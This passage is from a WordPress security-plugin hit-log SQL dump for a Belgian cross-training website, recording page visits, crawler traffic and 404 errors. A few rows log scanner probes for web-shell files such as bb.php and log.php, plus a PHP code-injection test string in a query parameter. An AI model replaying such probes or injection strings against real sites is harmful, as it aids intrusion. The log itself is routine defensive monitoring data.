(76257, 1498566435.599939, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76258, 1498566436.070382, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76259, 1498566436.644835, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76260, 1498566437.080790, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76261, 1498566437.496651, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76262, 1498566437.984177, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76263, 1498566438.575338, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76264, 1498567893.493163, 1834512911, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(76265, 1498572283.926350, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76266, 1498575945.084582, 1123634948, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76267, 1498575946.542616, 1123635081, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76268, 1498576123.661525, 2509959733, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(76269, 1498577497.794086, 919627301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76270, 1498577498.331629, 919627301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76271, 1498578622.906517, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76272, 1498580446.476553, 1336759242, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/log.php', 'http://crosstrainingcenter.be/wp-content/plugins/log.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76273, 1498581399.348594, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76274, 1498586061.764844, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(76275, 1498586062.411260, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76276, 1498586062.973796, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76277, 1498586063.436271, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76278, 1498586063.920501, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76279, 1498586064.452599, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76280, 1498586064.892306, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76281, 1498586065.377786, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76282, 1498586065.818417, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76283, 1498586066.264446, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76284, 1498586066.697859, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76285, 1498586067.201944, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76286, 1498586067.642930, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76287, 1498586068.250082, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76288, 1498587959.239063, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76289, 1498590344.427493, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76290, 1498590345.084329, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76291, 1498590345.527172, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76292, 1498590345.962062, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76293, 1498590346.595970, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76294, 1498590347.051864, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76295, 1498590347.604482, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76296, 1498590348.061127, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76297, 1498590348.497448, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76298, 1498590348.924655, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76299, 1498590349.337948, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76300, 1498595432.379467, 1538704198, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0ahUKEwiWoI_y7t7UAhWMaVAKHXtfDSYQFghnMA8&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76301, 1498595433.900990, 1538704198, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(76302, 1498595437.740421, 1538704198, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76303, 1498595438.842754, 1538704198, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(76304, 1498595457.848020, 1538704198, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76305, 1498595467.379005, 1538704198, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76306, 1498598256.426130, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76307, 1498598256.983182, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76308, 1498598257.486519, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76309, 1498598258.029932, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76310, 1498598258.510202, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76311, 1498598258.956821, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76312, 1498598259.474084, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76313, 1498598260.049770, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76314, 1498598260.469476, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(76315, 1498598260.965884, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76316, 1498598261.469041, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76317, 1498601754.956040, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76318, 1498604286.099644, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76319, 1498607555.603689, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76320, 1498610894.390571, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76321, 1498612491.759405, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76322, 1498616014.185634, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76323, 1498621118.498960, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76324, 1498621180.347771, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76325, 1498621706.312016, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76326, 1498622815.727931, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76327, 1498623944.587010, 3475901792, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76328, 1498625723.955486, 2637637426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76329, 1498626243.342951, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76330, 1498629090.306686, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76331, 1498629832.131410, 3569402886, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/shop', 'crosstrainingcenter.be/shop', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76332, 1498629844.142319, 3569402886, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/shop', 'crosstrainingcenter.be/shop', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76333, 1498630446.166761, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76334, 1498632218.891403, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76335, 1498634932.431363, 2513051914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76336, 1498634988.965758, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(76337, 1498635032.589607, 2513051914, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/upgrade/bb.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76338, 1498635104.817142, 2513051914, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/bb.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76339, 1498635238.705267, 2513051914, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/b.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76340, 1498638177.141768, 2513061429, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/indes.php?15=printmd532423;exit;', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76341, 1498638193.691561, 2513061429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?15=printmd532423;exit;', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76342, 1498638433.228554, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76343, 1498638433.947256, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76344, 1498643033.852932, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76345, 1498649270.917444, 3475901792, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76346, 1498650673.578043, 3157024305, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76347, 1498650727.215060, 3157024305, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76348, 1498650760.445063, 3157024305, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76349, 1498650932.479516, 3157024305, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76350, 1498652977.886421, 676177702, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76351, 1498653993.745756, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76352, 1498657252.091378, 632818382, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76353, 1498657252.754873, 632818382, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76354, 1498657253.278243, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76355, 1498657253.739970, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76356, 1498657254.190413, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76357, 1498657254.668859, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76358, 1498657255.205082, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76359, 1498657255.676895, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76360, 1498657256.142412, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76361, 1498657256.596424, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76362, 1498657257.268141, 632818382, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76363, 1498660873.424128, 772030661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76364, 1498660876.187214, 772030661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76365, 1498660878.724681, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76366, 1498660880.656278, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76367, 1498660882.968884, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76368, 1498660885.637392, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76369, 1498660887.595001, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76370, 1498660890.296376, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76371, 1498660894.693230, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(76372, 1498660899.828857, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76373, 1498660900.327044, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76374, 1498660900.884896, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76375, 1498660901.413718, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
